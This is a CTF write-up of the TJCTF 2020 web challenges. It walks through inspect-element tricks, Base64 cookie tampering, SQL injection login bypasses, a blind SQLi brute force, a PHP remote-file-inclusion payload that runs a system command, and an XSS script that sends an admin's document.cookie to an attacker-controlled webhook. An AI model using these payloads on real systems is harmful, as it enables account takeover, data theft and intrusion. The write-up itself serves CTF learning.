arrow-left arrow-right brightness-2 chevron-left chevron-right circle-half-full dots-horizontal facebook-box facebook loader magnify menu-down rss-box star twitter-box twitter white-balance-sunny window-close
Hacking TJCTF's Web Challenges
3 min read

Hacking TJCTF's Web Challenges

Hacking TJCTF's Web Challenges

TJCTF organized an online Capture the Flag competition from Fri, May 22, 2020 08:00 — Tue, May 26, 08:00 PHT. I solved 8/12 web challenges and this writeup will explain how I solved each problems.

Broken Button

Description: This site is telling me all I need to do is click a button to find the flag! Is it really that easy?


  1. Inspect element the Button
  2. You'll find a link pointed to!.html
  3. Flag: tjctf{wHa1_A_Gr8_1nsp3ct0r!}


Description: Could you login into this very secure site? Best of luck!


  1. View the Source Code of the website
  2. Analyze the script
  3. You have admin as the username and the password is the decoded value of c2a094f7d35f2299b414b6a1b3bd595a which is inevitable.
  4. Login and get the flag -> tjctf{inevitable890898}

Sarah Palin Fanpage

Description: Are you a true fan of Alaska's most famous governor? Visit the Sarah Palin fanpage.


  1. Go to the VIP area
  2. Get the value of cookie

3. Decode it using Base64


4. Change all the false to true.

5. Encode it with Base64


6. Apply it to the website and get the flag


Login Sequel

Description: Login as admin you must. This time, the client is of no use :(. What to do?


  1. View the source code
  2. Analyze the SQL Query
cursor.execute('SELECT username, password FROM `userandpassword` WHERE username=\'%s\' AND password=\'%s\'' % (username, hashlib.md5(password.encode())))

3. Inject a payload in username with /* characters to comment everything after the payload. The # is probably blacklisted.

  1. Payload: admin'/*
  2. Login and get the flag -> tjctf{W0w_wHa1_a_SqL1_exPeRt!}


Description: It seems your login bypass skills are now famous! One of my friends has given you a challenge: figure out his password on this site. He's told me that his username is admin, and that his password is made of up only lowercase letters and numbers. (Wrap the password with tjctf{...})

I managed to bypass the login page using ' or 1=1-- as password but the challenge says that the password is the flag. So I had to exploit it.

  1. The page returns Congratulations! when you successfully logged in. So I used it as identifier in my script.
  2. I used admin' and password LIKE 'a%' -- payload for my brute force script written in python.
  3. I used abcdefghijklmnopqrstuvwxyz0123456789 as a set of characters that will continuously change the payload and send request to the server.
  1. Flag is tjctf{blindsqli14519}

Gamer W

Description: Can you figure out how to cheat the system? Grab his hat to prove your victory!

Write Up:

File Viewer

Description: So I've been developing this really cool site where you can read text files! It's still in beta mode, though, so there's only six files you can read.


  1. Go to the website and test for vulnerabilities
  2. Found out that it was vulnerable to Remote File Inclusion
  3. Create a simple payload:
<?php echo system('cat /var/www/html/i_wonder_whats_in_here/flag.php'); ?>

4. Start a Python server and pass it to ngrok.

5. Send a request:

6. View the source code and get the flag: tjctf{n1c3_j0b_with_lf1_2_rc3}

Yep, you can elevate it to RCE.

FB Library

Description: The Independent ForkBomb Academy has a new online library catalog! I asked the student librarians to add some books but they just ended up fooling around instead. If you see any weird books report them to me and I'll take a look.


  1. Create an account and login
  2. Find a book and report it. URL should be like this:
  3. Change the value of url parameter to your domain.
  4. Create a simple javascript with payload in that captures the cookie of the admin and host it in your domain.
<script type="text/javascript"> = 'document.location = "https://my_own_webhook/?data=" + document.cookie';
	location = '<script>eval(name)/*';

5. The idea came from Renwa's blog:

6. Monitor your webhook and you should be able to get the session of the admin.

7. Change the session in your browser and get the flag: tjctf{trunc4t3d_n0_pr0bl3m_rly???}